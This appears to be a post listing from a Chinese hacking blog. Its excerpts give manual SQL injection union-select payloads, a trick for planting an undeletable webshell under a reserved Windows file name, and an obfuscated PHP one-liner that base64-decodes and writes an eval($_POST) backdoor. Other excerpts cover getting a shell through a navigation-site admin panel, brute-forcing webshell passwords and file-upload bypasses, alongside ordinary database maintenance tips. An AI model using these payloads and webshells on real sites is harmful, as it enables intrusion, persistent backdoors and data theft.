PHP+MySQL 手工注入语句

暴字段长度 order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select ver...

- 阅读全文 -

MySQL定时备份Windows主机

对于Windows主机   ==============   假想环境:   MySQL 安装位置:C:\MySQL   论坛数据库名称为:bbs   MySQL root 密码:123456   数据库备份目的地:D:\db_backup\   程序代码   @echo off   C:\MySQL\bin\mysqladmin -u root --password=123456 shutdow...

- 阅读全文 -

新方法打造永不被删除的webshell

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现: D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp 已复制 1 个文件。 D:\AspWebServer\wwwroot>dir 驱动器 D 中...

- 阅读全文 -

MSSQL数据库日志满后快速解决办法

先提供一种复杂的方法压缩日志及数据库文件如下: 1.清空日志 DUMP TRANSACTION 库名 WITH NO_LOG 2.截断事务日志: BACKUP LOG 数据库名 WITH NO_LOG 3.收缩数据库文件(如果不压缩,数据库的文件不会减小 企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件 --选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收...

- 阅读全文 -

架设基于windows2003的安全Asp.net服务器

随着Microsoft Visual Studio 开发环境的普及,基于Asp .Net坏境的网站越来越多。因此Asp .net服务器的安全问题自然而然的成为了人们关心的问题。本文以Windows2003为例,架设一台安全的Asp .Net的服务器。 实验坏境: 操作系统:Microsoft Windows Server 2003 Enterprise Edition Service Pack 2...

- 阅读全文 -

mysql官方网站被黑并获得了ROOT权限

太牛X了,mysql都被强奸了,世界又开始混乱...... Amorize的安全研究人员最近表示,已经确认黑客入侵mysql.com,并通过iframe的方法 让用户感染了恶意代码,他们已经追踪到佛罗里达和瑞典两个恶意软件托管地,在当地时 间周一下午依然在对mysql.com的访客实施攻击,用户凭据可能已经遭到了窃取,因此 建议mysql.com注册过的用户修改自己与此相同的密码。 更糟的是研究发...

- 阅读全文 -

114啦网址导航v1.15后台拿shell

我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。 后台 点击模块管理--->分类模块-->添加模块 直接添加后缀为php或asp的 都可以 内容就是马的内容。 马地址 在admin\tpls\tpls\main\green\class目录下

- 阅读全文 -

PHP一句话变型

<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?> <script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),bas...

- 阅读全文 -

(转载)万能破解webshell密码

前一阵发表的自动循环机破解无返回错误的一句话,大家可能有很多疑虑,这次给大家显示一个彻底通杀的办法。 先来看看一款PHP shell,如图: 这款shell输入错误密码没有返回错误信息,在登录页面里找关键字也不可以爆破,难道真的没办法啦~下面就来演示下 先用抓包工具抓一下包,可以看到是post提交方式 把抓到的包填写到自动循环机里,并执行一下看下返回信息是不是200 设置上字典文件,这里我们把po...

- 阅读全文 -

渗透思路+技巧

上传漏洞拿shell: 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell. 2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。 3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。 4.gif文件头欺骗 5.同名重复上传也很OK。:   渗透过程中常用命令...

- 阅读全文 -